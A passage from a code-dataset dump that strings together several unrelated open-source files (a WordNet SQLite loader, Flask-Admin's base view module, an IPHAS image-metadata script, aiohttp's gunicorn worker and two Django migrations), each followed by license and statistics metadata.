(k, v) = line.split('\t')
senslinks[k] = v
for ss in wn.all_synsets():
pos = ss.pos()
pid = pos_id[pos.replace('s', 'a')]
# SSREL
for r in synlinks.keys():
for ss2 in getattr(ss, synlinks[r])():
c.execute("""INSERT INTO sslink (ss1_id, ssrel_id, ss2_id, u)
VALUES (?,?,?,?)""",
(ssid[ss2of(ss)], ssrel_id[r], ssid[ss2of(ss2)], u))
sslink_id = c.lastrowid
c.execute("""INSERT INTO sslink_src (sslink_id, src_id, conf, lang_id, u)
VALUES (?,?,?,?,?)""",
(sslink_id, src_id, 1, lang_id, u))
if r in linkrev.keys(): # insert the reverse relation
c.execute("""INSERT INTO sslink (ss1_id, ssrel_id, ss2_id, u)
VALUES (?,?,?,?)""",
(ssid[ss2of(ss2)], ssrel_id[linkrev[r]], ssid[ss2of(ss)], u))
sslink_id = c.lastrowid
c.execute("""INSERT INTO sslink_src (sslink_id, src_id, conf, lang_id, u)
VALUES (?,?,?,?,?)""",
(sslink_id, src_id, 1, lang_id, u))
# SS LEXNAMES
lxn = ss.lexname()
c.execute("""INSERT INTO ssxl (ss_id, resource_id, x1, x2, x3, u)
VALUES (?,?,?,?,?,?)
""", (ssid[ss2of(ss)], lexnames_resource_id, lexname['id'][lxn],
lxn, lexname['eng'][lxn], u))
# SS VERBFRAMES
sframes = ss.frame_ids()
for frame in sframes:
c.execute("""INSERT INTO ssxl (ss_id, resource_id, x1, x2, x3, u)
VALUES (?,?,?,?,?,?)
""", (ssid[ss2of(ss)], verbframes_resource_id, frame,
vframe['eng'][frame], vframe['engsym'][frame], u))
# SENSE LINKS
for l1 in ss.lemmas():
s1_id = ss_lemma_sense_id[(ss,l1)]
lframeids = l1.frame_ids() # lemma frames
for frame in lframeids:
c.execute("""INSERT INTO sxl (s_id, resource_id, x1, x2, x3, u)
VALUES (?,?,?,?,?,?)
""", (s1_id, verbframes_resource_id, frame,
vframe['eng'][frame], vframe['engsym'][frame], u))
for r in senslinks:
for l2 in getattr(l1, senslinks[r])():
s2_id = ss_lemma_sense_id[(l2.synset(),l2)]
c.execute("""INSERT INTO slink (s1_id, srel_id, s2_id, u)
VALUES (?,?,?,?)""",
(s1_id, srel_id[r], s2_id, u))
slink_id = c.lastrowid
c.execute("""INSERT INTO slink_src (slink_id, src_id, conf, u)
VALUES (?,?,?,?)""",
(slink_id, src_id, 1, u))
con.commit()
con.close()
sys.stderr.write('Loaded PWN30!')
|
mit
| -2,236,290,472,514,885,400
| 32.240367
| 333
| 0.54278
| false
| 2.982058
| false
| false
| false
|
Kha/flask-admin
|
flask_admin/base.py
|
1
|
20999
|
import os.path as op
from functools import wraps
from flask import Blueprint, current_app, render_template, abort, g, url_for
from flask_admin import babel
from flask_admin._compat import with_metaclass, as_unicode
from flask_admin import helpers as h
# For compatibility reasons import MenuLink
from flask_admin.menu import MenuCategory, MenuView, MenuLink
def expose(url='/', methods=('GET',)):
"""
Use this decorator to expose views in your view classes.
:param url:
Relative URL for the view
:param methods:
Allowed HTTP methods. By default only GET is allowed.
"""
def wrap(f):
if not hasattr(f, '_urls'):
f._urls = []
f._urls.append((url, methods))
return f
return wrap
def expose_plugview(url='/'):
"""
Decorator to expose Flask's pluggable view classes
(``flask.views.View`` or ``flask.views.MethodView``).
:param url:
Relative URL for the view
.. versionadded:: 1.0.4
"""
def wrap(v):
handler = expose(url, v.methods)
if hasattr(v, 'as_view'):
return handler(v.as_view(v.__name__))
else:
return handler(v)
return wrap
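# Example (sketch, names hypothetical): exposing a MethodView inside a view class:
#   class MyAdmin(BaseView):
#       @expose_plugview('/_api/1')
#       class API_v1(MethodView):
#           def get(self, cls):
#               # `cls` is the admin view instance injected by _wrap_view
#               return cls.render('admin/api.html')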
# Base views
def _wrap_view(f):
# Avoid wrapping view method twice
if hasattr(f, '_wrapped'):
return f
@wraps(f)
def inner(self, *args, **kwargs):
# Store current admin view
h.set_current_view(self)
# Check if administrative piece is accessible
abort = self._handle_view(f.__name__, **kwargs)
if abort is not None:
return abort
return self._run_view(f, *args, **kwargs)
inner._wrapped = True
return inner
class AdminViewMeta(type):
"""
View metaclass.
Does some precalculations (like getting the list of view methods from the class) to avoid
calculating them for each view class instance.
"""
def __init__(cls, classname, bases, fields):
type.__init__(cls, classname, bases, fields)
# Gather exposed views
cls._urls = []
cls._default_view = None
for p in dir(cls):
attr = getattr(cls, p)
if hasattr(attr, '_urls'):
# Collect methods
for url, methods in attr._urls:
cls._urls.append((url, p, methods))
if url == '/':
cls._default_view = p
# Wrap views
setattr(cls, p, _wrap_view(attr))
class BaseViewClass(object):
pass
class BaseView(with_metaclass(AdminViewMeta, BaseViewClass)):
"""
Base administrative view.
Derive from this class to implement your administrative interface piece. For example::
from flask_admin import BaseView, expose
class MyView(BaseView):
@expose('/')
def index(self):
return 'Hello World!'
Icons can be added to the menu by using `menu_icon_type` and `menu_icon_value`. For example::
admin.add_view(MyView(name='My View', menu_icon_type='glyph', menu_icon_value='glyphicon-home'))
"""
@property
def _template_args(self):
"""
Extra template arguments.
If you need to pass some extra parameters to the template,
you can override particular view function, contribute
arguments you want to pass to the template and call parent view.
These arguments are local for this request and will be discarded
in the next request.
Any value passed through ``_template_args`` will override whatever
parent view function passed to the template.
For example::
class MyAdmin(ModelView):
@expose('/')
def index(self):
self._template_args['name'] = 'foobar'
self._template_args['code'] = '12345'
return super(MyAdmin, self).index()
"""
args = getattr(g, '_admin_template_args', None)
if args is None:
args = g._admin_template_args = dict()
return args
def __init__(self, name=None, category=None, endpoint=None, url=None,
static_folder=None, static_url_path=None,
menu_class_name=None, menu_icon_type=None, menu_icon_value=None):
"""
Constructor.
:param name:
Name of this view. If not provided, will default to the class name.
:param category:
View category. If not provided, this view will be shown as a top-level menu item. Otherwise, it will
be in a submenu.
:param endpoint:
Base endpoint name for the view. For example, if there's a view method called "index" and
endpoint is set to "myadmin", you can use `url_for('myadmin.index')` to get the URL to the
view method. Defaults to the class name in lower case.
:param url:
Base URL. If provided, affects how URLs are generated. For example, if the url parameter
is "test", the resulting URL will look like "/admin/test/". If not provided, will
use endpoint as a base url. However, if URL starts with '/', absolute path is assumed
and '/admin/' prefix won't be applied.
:param static_url_path:
Static URL Path. If provided, this specifies the path to the static url directory.
:param menu_class_name:
Optional class name for the menu item.
:param menu_icon_type:
Optional icon. Possible icon types:
- `flask_admin.consts.ICON_TYPE_GLYPH` - Bootstrap glyph icon
- `flask_admin.consts.ICON_TYPE_FONT_AWESOME` - Font Awesome icon
- `flask_admin.consts.ICON_TYPE_IMAGE` - Image relative to Flask static directory
- `flask_admin.consts.ICON_TYPE_IMAGE_URL` - Image with full URL
:param menu_icon_value:
Icon glyph name or URL, depending on `menu_icon_type` setting
"""
self.name = name
self.category = category
self.endpoint = self._get_endpoint(endpoint)
self.url = url
self.static_folder = static_folder
self.static_url_path = static_url_path
self.menu = None
self.menu_class_name = menu_class_name
self.menu_icon_type = menu_icon_type
self.menu_icon_value = menu_icon_value
# Initialized from create_blueprint
self.admin = None
self.blueprint = None
# Default view
if self._default_view is None:
raise Exception(u'Attempted to instantiate admin view %s without default view' % self.__class__.__name__)
def _get_endpoint(self, endpoint):
"""
Generate Flask endpoint name. By default converts class name to lower case if endpoint is
not explicitly provided.
"""
if endpoint:
return endpoint
return self.__class__.__name__.lower()
def _get_view_url(self, admin, url):
"""
Generate URL for the view. Override to change default behavior.
"""
if url is None:
if admin.url != '/':
url = '%s/%s' % (admin.url, self.endpoint)
else:
if self == admin.index_view:
url = '/'
else:
url = '/%s' % self.endpoint
else:
if not url.startswith('/'):
url = '%s/%s' % (admin.url, url)
return url
def create_blueprint(self, admin):
"""
Create Flask blueprint.
"""
# Store admin instance
self.admin = admin
# If the static_url_path is not provided, use the admin's
if not self.static_url_path:
self.static_url_path = admin.static_url_path
# Generate URL
self.url = self._get_view_url(admin, self.url)
# If we're working from the root of the site, set prefix to None
if self.url == '/':
self.url = None
# prevent admin static files from conflicting with flask static files
if not self.static_url_path:
self.static_folder = 'static'
self.static_url_path = '/static/admin'
# If name is not provided, use the prettified class name
if self.name is None:
self.name = self._prettify_class_name(self.__class__.__name__)
# Create blueprint and register rules
self.blueprint = Blueprint(self.endpoint, __name__,
url_prefix=self.url,
subdomain=self.admin.subdomain,
template_folder=op.join('templates', self.admin.template_mode),
static_folder=self.static_folder,
static_url_path=self.static_url_path)
for url, name, methods in self._urls:
self.blueprint.add_url_rule(url,
name,
getattr(self, name),
methods=methods)
return self.blueprint
def render(self, template, **kwargs):
"""
Render template
:param template:
Template path to render
:param kwargs:
Template arguments
"""
# Store self as admin_view
kwargs['admin_view'] = self
kwargs['admin_base_template'] = self.admin.base_template
# Provide i18n support even if flask-babel is not installed
# or enabled.
kwargs['_gettext'] = babel.gettext
kwargs['_ngettext'] = babel.ngettext
kwargs['h'] = h
# Expose get_url helper
kwargs['get_url'] = self.get_url
# Expose config info
kwargs['config'] = current_app.config
# Contribute extra arguments
kwargs.update(self._template_args)
return render_template(template, **kwargs)
def _prettify_class_name(self, name):
"""
Split words in PascalCase string into separate words.
:param name:
String to prettify
"""
return h.prettify_class_name(name)
def is_visible(self):
"""
Override this method if you want to dynamically hide or show administrative views
from Flask-Admin menu structure
By default, item is visible in menu.
Please note that item should be both visible and accessible to be displayed in menu.
"""
return True
def is_accessible(self):
"""
Override this method to add permission checks.
Flask-Admin does not make any assumptions about the authentication system used in your application, so it is
up to you to implement it.
By default, it will allow access for everyone.
"""
return True
def _handle_view(self, name, **kwargs):
"""
This method will be executed before calling any view method.
It will execute the ``inaccessible_callback`` if the view is not
accessible.
:param name:
View function name
:param kwargs:
View function arguments
"""
if not self.is_accessible():
return self.inaccessible_callback(name, **kwargs)
def _run_view(self, fn, *args, **kwargs):
"""
This method will run actual view function.
While it is similar to _handle_view, can be used to change
arguments that are passed to the view.
:param fn:
View function
:param kwargs:
Arguments
"""
return fn(self, *args, **kwargs)
def inaccessible_callback(self, name, **kwargs):
"""
Handle the response to inaccessible views.
By default, it throws an HTTP 403 error. Override this method to
customize the behaviour.
"""
return abort(403)
def get_url(self, endpoint, **kwargs):
"""
Generate URL for the endpoint. If you want to customize URL generation
logic (persist some query string argument, for example), this is
the right place to do it.
:param endpoint:
Flask endpoint name
:param kwargs:
Arguments for `url_for`
"""
return url_for(endpoint, **kwargs)
@property
def _debug(self):
if not self.admin or not self.admin.app:
return False
return self.admin.app.debug
class AdminIndexView(BaseView):
"""
Default administrative interface index page when visiting the ``/admin/`` URL.
It can be overridden by passing your own view class to the ``Admin`` constructor::
class MyHomeView(AdminIndexView):
@expose('/')
def index(self):
arg1 = 'Hello'
return self.render('admin/myhome.html', arg1=arg1)
admin = Admin(index_view=MyHomeView())
Also, you can change the root url from /admin to / with the following::
admin = Admin(
app,
index_view=AdminIndexView(
name='Home',
template='admin/myhome.html',
url='/'
)
)
Default values for the index page are:
* If a name is not provided, 'Home' will be used.
* If an endpoint is not provided, will default to ``admin``
* Default URL route is ``/admin``.
* Automatically associates with static folder.
* Default template is ``admin/index.html``
"""
def __init__(self, name=None, category=None,
endpoint=None, url=None,
template='admin/index.html',
menu_class_name=None,
menu_icon_type=None,
menu_icon_value=None):
super(AdminIndexView, self).__init__(name or babel.lazy_gettext('Home'),
category,
endpoint or 'admin',
url or '/admin',
'static',
menu_class_name=menu_class_name,
menu_icon_type=menu_icon_type,
menu_icon_value=menu_icon_value)
self._template = template
@expose()
def index(self):
return self.render(self._template)
class Admin(object):
"""
Collection of the admin views. Also manages menu structure.
"""
def __init__(self, app=None, name=None,
url=None, subdomain=None,
index_view=None,
translations_path=None,
endpoint=None,
static_url_path=None,
base_template=None,
template_mode=None,
category_icon_classes=None):
"""
Constructor.
:param app:
Flask application object
:param name:
Application name. Will be displayed in the main menu and as a page title. Defaults to "Admin"
:param url:
Base URL
:param subdomain:
Subdomain to use
:param index_view:
Home page view to use. Defaults to `AdminIndexView`.
:param translations_path:
Location of the translation message catalogs. By default will use the translations
shipped with Flask-Admin.
:param endpoint:
Base endpoint name for index view. If you use multiple instances of the `Admin` class with
a single Flask application, you have to set a unique endpoint name for each instance.
:param static_url_path:
Static URL Path. If provided, this specifies the default path to the static url directory for
all its views. Can be overridden in view configuration.
:param base_template:
Override base HTML template for all static views. Defaults to `admin/base.html`.
:param template_mode:
Base template path. Defaults to `bootstrap2`. If you want to use
Bootstrap 3 integration, change it to `bootstrap3`.
:param category_icon_classes:
A dict of category names as keys and html classes as values to be added to menu category icons.
Example: {'Favorites': 'glyphicon glyphicon-star'}
"""
self.app = app
self.translations_path = translations_path
self._views = []
self._menu = []
self._menu_categories = dict()
self._menu_links = []
if name is None:
name = 'Admin'
self.name = name
self.index_view = index_view or AdminIndexView(endpoint=endpoint, url=url)
self.endpoint = endpoint or self.index_view.endpoint
self.url = url or self.index_view.url
self.static_url_path = static_url_path
self.subdomain = subdomain
self.base_template = base_template or 'admin/base.html'
self.template_mode = template_mode or 'bootstrap2'
self.category_icon_classes = category_icon_classes or dict()
# Add predefined index view
self.add_view(self.index_view)
# Register with application
if app is not None:
self._init_extension()
def add_view(self, view):
"""
Add a view to the collection.
:param view:
View to add.
"""
# Add to views
self._views.append(view)
# If app was provided in constructor, register view with Flask app
if self.app is not None:
self.app.register_blueprint(view.create_blueprint(self))
self._add_view_to_menu(view)
def add_link(self, link):
"""
Add link to menu links collection.
:param link:
Link to add.
"""
if link.category:
self._add_menu_item(link, link.category)
else:
self._menu_links.append(link)
def _add_menu_item(self, menu_item, target_category):
if target_category:
cat_text = as_unicode(target_category)
category = self._menu_categories.get(cat_text)
# create a new menu category if one does not exist already
if category is None:
category = MenuCategory(target_category)
category.class_name = self.category_icon_classes.get(cat_text)
self._menu_categories[cat_text] = category
self._menu.append(category)
category.add_child(menu_item)
else:
self._menu.append(menu_item)
def _add_view_to_menu(self, view):
"""
Add a view to the menu tree
:param view:
View to add
"""
self._add_menu_item(MenuView(view.name, view), view.category)
def get_category_menu_item(self, name):
return self._menu_categories.get(name)
def init_app(self, app):
"""
Register all views with the Flask application.
:param app:
Flask application instance
"""
self.app = app
self._init_extension()
# Register views
for view in self._views:
app.register_blueprint(view.create_blueprint(self))
def _init_extension(self):
if not hasattr(self.app, 'extensions'):
self.app.extensions = dict()
admins = self.app.extensions.get('admin', [])
for p in admins:
if p.endpoint == self.endpoint:
raise Exception(u'Cannot have two Admin() instances with same'
u' endpoint name.')
if p.url == self.url and p.subdomain == self.subdomain:
raise Exception(u'Cannot assign two Admin() instances with same'
u' URL and subdomain to the same application.')
admins.append(self)
self.app.extensions['admin'] = admins
def menu(self):
"""
Return the menu hierarchy.
"""
return self._menu
def menu_links(self):
"""
Return menu links.
"""
return self._menu_links
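# Typical setup (sketch; MyView as in the BaseView docstring above):
#   app = Flask(__name__)
#   admin = Admin(app, name='My App', template_mode='bootstrap3')
#   admin.add_view(MyView(name='Hello', category='Examples'))
#   admin.add_link(MenuLink(name='Site', url='/'))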
|
bsd-3-clause
| -4,105,701,313,336,007,000
| 32.437898
| 120
| 0.54455
| false
| 4.672675
| false
| false
| false
|
barentsen/iphas-dr2
|
scripts/release-preparation/augment-image-metadata.py
|
1
|
3046
|
"""Script to create a user-friendly index of IPHAS image meta data.
"""
import numpy as np
from astropy.table import Table
from astropy.table import Column
from dr2.constants import IPHASQC
# Index of images found by the DR2 pipeline
# ie. produced by dr2.images.prepare_images()
t = Table.read('iphas-images-pipeline.fits')
# Run 376022 on the disk received from CASU is a corrupt file
t.remove_row(np.argwhere(t['run'] == 376022)[0][0])
# Run 367744 appeared twice in iphas-qc.fits
t.remove_rows(np.argwhere(t['run'] == 367744)[4:])
# Add the URL of the image location
urldata = ['http://www.iphas.org/data/images/'+name[0:4]+'/'+name for name in t['filename']]
url = Column(name='url', data=urldata)
t.add_column(url, 0)
t.remove_column('filename')
# Load auxiliary data from the IPHAS-QC file
runs = np.concatenate((IPHASQC['run_r'], IPHASQC['run_i'], IPHASQC['run_ha']))
fields = np.concatenate((IPHASQC['id'], IPHASQC['id'], IPHASQC['id']))
qflags = np.concatenate((IPHASQC['qflag'], IPHASQC['qflag'], IPHASQC['qflag']))
qcproblems = np.concatenate((IPHASQC['problems'], IPHASQC['problems'], IPHASQC['problems']))
depth5sig = np.concatenate((IPHASQC['r5sig_judged'],
IPHASQC['i5sig_judged'],
IPHASQC['h5sig_judged']))
field_dict = dict(zip(runs, fields))
qflag_dict = dict(zip(runs, qflags))
qcproblems_dict = dict(zip(runs, qcproblems))
depth5sig_dict = dict(zip(runs, depth5sig))
# Add the IPHAS field number
field = Column(name='fieldid', data=[field_dict[r] for r in t['run']])
t.add_column(field)
# Add the DR2 quality grade
qcgrade = Column(name='qcgrade', data=[qflag_dict[r] for r in t['run']])
t.add_column(qcgrade)
# Add the 'quality problems' summary
qcproblems = Column(name='qcproblems', data=[qcproblems_dict[r] for r in t['run']])
t.add_column(qcproblems)
# Add the 5-sigma detection limit
depth = Column(name='depth', data=[depth5sig_dict[r] for r in t['run']])
t.add_column(depth)
# Limit the number of decimals in the ascii output:
t['ra'].format = '{0:.3f}'
t['dec'].format = '{0:.3f}'
t.remove_column('airmass')
t.sort(['run', 'ccd'])
# We will export the resulting table to FITS, ASCII, and SQLITE
# First, export to FITS
columns = ['run', 'ccd', 'url', 'ra', 'dec', 'band', 'utstart',
'fieldid', 'in_dr2', 'qcgrade', 'qcproblems',
'exptime', 'seeing', 'elliptic', 'skylevel', 'skynoise',
'depth', 'photzp', 'confmap',
'ra_min', 'ra_max', 'dec_min', 'dec_max']
t[columns].write('iphas-images.fits.gz', overwrite=True)
# Export to ASCII
t['url', 'ra', 'dec', 'band', 'fieldid', 'in_dr2', 'qcgrade'].write('iphas-images.txt', format='ascii.fixed_width')
# Export to SQLITE (using atpy as astropy doesn't support sqlite yet)
import atpy
tbl = atpy.Table('iphas-images.fits.gz', name='images')
tbl.write('sqlite', 'iphas-images.sqlite', overwrite=True)
# For fast queries, you might want to do:
# CREATE INDEX images_ra_min_idx ON images(ra_min);
# CREATE INDEX images_ra_max_idx ON images(ra_max);
# VACUUM;
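# Example query (sketch) once the indexes above exist:
#   SELECT url, band, depth FROM images
#   WHERE ra_min < 98.5 AND ra_max > 98.5
#     AND dec_min < 2.0 AND dec_max > 2.0;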
|
mit
| 7,983,065,310,120,781,000
| 37.0875
| 115
| 0.673342
| false
| 2.857411
| false
| false
| false
|
aio-libs/aiohttp
|
aiohttp/worker.py
|
1
|
7750
|
"""Async gunicorn worker for aiohttp.web"""
import asyncio
import os
import re
import signal
import sys
from types import FrameType
from typing import Any, Awaitable, Callable, Optional, Union # noqa
from gunicorn.config import AccessLogFormat as GunicornAccessLogFormat
from gunicorn.workers import base
from aiohttp import web
from .helpers import set_result
from .web_app import Application
from .web_log import AccessLogger
try:
import ssl
SSLContext = ssl.SSLContext
except ImportError: # pragma: no cover
ssl = None # type: ignore[assignment]
SSLContext = object # type: ignore[misc,assignment]
__all__ = ("GunicornWebWorker", "GunicornUVLoopWebWorker", "GunicornTokioWebWorker")
class GunicornWebWorker(base.Worker): # type: ignore[misc,no-any-unimported]
DEFAULT_AIOHTTP_LOG_FORMAT = AccessLogger.LOG_FORMAT
DEFAULT_GUNICORN_LOG_FORMAT = GunicornAccessLogFormat.default
def __init__(self, *args: Any, **kw: Any) -> None: # pragma: no cover
super().__init__(*args, **kw)
self._task = None # type: Optional[asyncio.Task[None]]
self.exit_code = 0
self._notify_waiter = None # type: Optional[asyncio.Future[bool]]
def init_process(self) -> None:
# create new event_loop after fork
self.loop = asyncio.new_event_loop()
asyncio.set_event_loop(self.loop)
super().init_process()
def run(self) -> None:
self._task = self.loop.create_task(self._run())
try: # ignore all finalization problems
self.loop.run_until_complete(self._task)
except Exception:
self.log.exception("Exception in gunicorn worker")
self.loop.run_until_complete(self.loop.shutdown_asyncgens())
self.loop.close()
sys.exit(self.exit_code)
async def _run(self) -> None:
if isinstance(self.wsgi, Application):
app = self.wsgi
elif asyncio.iscoroutinefunction(self.wsgi):
app = await self.wsgi()
else:
raise RuntimeError(
"wsgi app should be either Application or "
"async function returning Application, got {}".format(self.wsgi)
)
access_log = self.log.access_log if self.cfg.accesslog else None
runner = web.AppRunner(
app,
logger=self.log,
keepalive_timeout=self.cfg.keepalive,
access_log=access_log,
access_log_format=self._get_valid_log_format(self.cfg.access_log_format),
)
await runner.setup()
ctx = self._create_ssl_context(self.cfg) if self.cfg.is_ssl else None
assert runner is not None
server = runner.server
assert server is not None
for sock in self.sockets:
site = web.SockSite(
runner,
sock,
ssl_context=ctx,
shutdown_timeout=self.cfg.graceful_timeout / 100 * 95,
)
await site.start()
# If our parent changed then we shut down.
pid = os.getpid()
try:
while self.alive: # type: ignore[has-type]
self.notify()
cnt = server.requests_count
if self.cfg.max_requests and cnt > self.cfg.max_requests:
self.alive = False
self.log.info("Max requests, shutting down: %s", self)
elif pid == os.getpid() and self.ppid != os.getppid():
self.alive = False
self.log.info("Parent changed, shutting down: %s", self)
else:
await self._wait_next_notify()
except BaseException:
pass
await runner.cleanup()
def _wait_next_notify(self) -> "asyncio.Future[bool]":
self._notify_waiter_done()
loop = self.loop
assert loop is not None
self._notify_waiter = waiter = loop.create_future()
self.loop.call_later(1.0, self._notify_waiter_done, waiter)
return waiter
def _notify_waiter_done(
self, waiter: Optional["asyncio.Future[bool]"] = None
) -> None:
if waiter is None:
waiter = self._notify_waiter
if waiter is not None:
set_result(waiter, True)
if waiter is self._notify_waiter:
self._notify_waiter = None
def init_signals(self) -> None:
# Set up signals through the event loop API.
self.loop.add_signal_handler(
signal.SIGQUIT, self.handle_quit, signal.SIGQUIT, None
)
self.loop.add_signal_handler(
signal.SIGTERM, self.handle_exit, signal.SIGTERM, None
)
self.loop.add_signal_handler(
signal.SIGINT, self.handle_quit, signal.SIGINT, None
)
self.loop.add_signal_handler(
signal.SIGWINCH, self.handle_winch, signal.SIGWINCH, None
)
self.loop.add_signal_handler(
signal.SIGUSR1, self.handle_usr1, signal.SIGUSR1, None
)
self.loop.add_signal_handler(
signal.SIGABRT, self.handle_abort, signal.SIGABRT, None
)
# Don't let SIGTERM and SIGUSR1 disturb active requests
# by interrupting system calls
signal.siginterrupt(signal.SIGTERM, False)
signal.siginterrupt(signal.SIGUSR1, False)
def handle_quit(self, sig: int, frame: FrameType) -> None:
self.alive = False
# worker_int callback
self.cfg.worker_int(self)
# wakeup closing process
self._notify_waiter_done()
def handle_abort(self, sig: int, frame: FrameType) -> None:
self.alive = False
self.exit_code = 1
self.cfg.worker_abort(self)
sys.exit(1)
@staticmethod
def _create_ssl_context(cfg: Any) -> "SSLContext":
"""Creates SSLContext instance for usage in asyncio.create_server.
See ssl.SSLSocket.__init__ for more details.
"""
if ssl is None: # pragma: no cover
raise RuntimeError("SSL is not supported.")
ctx = ssl.SSLContext(cfg.ssl_version)
ctx.load_cert_chain(cfg.certfile, cfg.keyfile)
ctx.verify_mode = cfg.cert_reqs
if cfg.ca_certs:
ctx.load_verify_locations(cfg.ca_certs)
if cfg.ciphers:
ctx.set_ciphers(cfg.ciphers)
return ctx
def _get_valid_log_format(self, source_format: str) -> str:
if source_format == self.DEFAULT_GUNICORN_LOG_FORMAT:
return self.DEFAULT_AIOHTTP_LOG_FORMAT
elif re.search(r"%\([^\)]+\)", source_format):
raise ValueError(
"Gunicorn's style options in form of `%(name)s` are not "
"supported for the log formatting. Please use aiohttp's "
"format specification to configure access log formatting: "
"http://docs.aiohttp.org/en/stable/logging.html"
"#format-specification"
)
else:
return source_format
class GunicornUVLoopWebWorker(GunicornWebWorker):
def init_process(self) -> None:
import uvloop
# Setup uvloop policy, so that every
# asyncio.get_event_loop() will create an instance
# of uvloop event loop.
asyncio.set_event_loop_policy(uvloop.EventLoopPolicy())
super().init_process()
class GunicornTokioWebWorker(GunicornWebWorker):
def init_process(self) -> None: # pragma: no cover
import tokio
# Setup tokio policy, so that every
# asyncio.get_event_loop() will create an instance
# of tokio event loop.
asyncio.set_event_loop_policy(tokio.EventLoopPolicy())
super().init_process()
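# Example (sketch): serving an aiohttp Application with this worker:
#   gunicorn my_module:app --bind localhost:8080 --worker-class aiohttp.GunicornWebWorker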
|
apache-2.0
| -3,391,215,136,565,814,000
| 31.291667
| 85
| 0.600129
| false
| 3.938008
| false
| false
| false
|
mbourqui/django-publications-bootstrap
|
publications_bootstrap/migrations/0004_catalog_fk_publication.py
|
1
|
1253
|
# -*- coding: utf-8 -*-
# Generated by Django 1.11.1 on 2017-07-04 09:18
from __future__ import unicode_literals
from django.db import migrations, models
app_label = 'publications_bootstrap'
def forwards(apps, schema_editor):
Catalog = apps.get_model(app_label, "Catalog")
for catalog in Catalog.objects.all():
for publication in catalog.publication_set.all():
catalog.publications.add(publication)
def backwards(apps, schema_editor):
Catalog = apps.get_model(app_label, "Catalog")
for catalog in Catalog.objects.all():
for publication in catalog.publications.all():
publication.catalog_set.add(catalog)
class Migration(migrations.Migration):
dependencies = [
('publications_bootstrap', '0003_db_index'),
]
operations = [
migrations.AddField(
model_name='catalog',
name='publications',
field=models.ManyToManyField(blank=True, db_index=True, to='publications_bootstrap.Publication'),
),
migrations.RunPython(forwards, backwards),
migrations.RemoveField(
model_name='publication',
name='catalogs',
),
]
|
mit
| 7,605,762,743,376,821,000
| 28.139535
| 109
| 0.652035
| false
| 4.218855
| false
| false
| false
|
undocume/undocume
|
home/migrations/0004_auto__add_field_service_city.py
|
1
|
6463
|
# -*- coding: utf-8 -*-
from south.utils import datetime_utils as datetime
from south.db import db
from south.v2 import SchemaMigration
from django.db import models
class Migration(SchemaMigration):
def forwards(self, orm):
# Adding field 'Service.city'
db.add_column(u'home_service', 'city',
self.gf('django.db.models.fields.CharField')(max_length=50, null=True, blank=True),
keep_default=False)
def backwards(self, orm):
# Deleting field 'Service.city'
db.delete_column(u'home_service', 'city')
models = {
u'home.category': {
'Meta': {'ordering': "['name']", 'object_name': 'Category'},
'description': ('django.db.models.fields.TextField', [], {'blank': 'True'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'image': ('django.db.models.fields.CharField', [], {'max_length': '200', 'null': 'True', 'blank': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '50'})
},
u'home.categorytranslate': {
'Meta': {'object_name': 'CategoryTranslate'},
'category': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['home.Category']"}),
'description': ('django.db.models.fields.TextField', [], {'blank': 'True'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'language': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['home.Language']"}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '50'})
},
u'home.information': {
'Meta': {'ordering': "['name']", 'object_name': 'Information'},
'description': ('django.db.models.fields.TextField', [], {'blank': 'True'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'informationtype': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['home.InformationType']"}),
'name': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '50'})
},
u'home.informationtranslate': {
'Meta': {'object_name': 'InformationTranslate'},
'description': ('django.db.models.fields.CharField', [], {'max_length': '500'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'information': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['home.Information']"}),
'language': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['home.Language']"}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '50'})
},
u'home.informationtype': {
'Meta': {'ordering': "['name']", 'object_name': 'InformationType'},
'description': ('django.db.models.fields.TextField', [], {'blank': 'True'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '50'})
},
u'home.language': {
'Meta': {'ordering': "['name']", 'object_name': 'Language'},
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '50'})
},
u'home.service': {
'Meta': {'ordering': "['name']", 'object_name': 'Service'},
'Type': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['home.TypeOrganization']"}),
'address': ('django.db.models.fields.CharField', [], {'max_length': '100', 'null': 'True', 'blank': 'True'}),
'category': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['home.Category']"}),
'city': ('django.db.models.fields.CharField', [], {'max_length': '50', 'null': 'True', 'blank': 'True'}),
'contact': ('django.db.models.fields.CharField', [], {'max_length': '100', 'null': 'True', 'blank': 'True'}),
'contactemail': ('django.db.models.fields.CharField', [], {'max_length': '30', 'null': 'True', 'blank': 'True'}),
'contactnumber': ('django.db.models.fields.CharField', [], {'max_length': '30', 'null': 'True', 'blank': 'True'}),
'created': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'description': ('django.db.models.fields.TextField', [], {'blank': 'True'}),
'fee': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '100'}),
'phone': ('django.db.models.fields.CharField', [], {'max_length': '50', 'null': 'True', 'blank': 'True'}),
'ss': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'state': ('django.db.models.fields.CharField', [], {'max_length': '2', 'null': 'True', 'blank': 'True'}),
'updated': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'blank': 'True'}),
'web': ('django.db.models.fields.CharField', [], {'max_length': '100', 'null': 'True', 'blank': 'True'}),
'zipcode': ('django.db.models.fields.CharField', [], {'max_length': '5', 'null': 'True', 'blank': 'True'})
},
u'home.servicetranslate': {
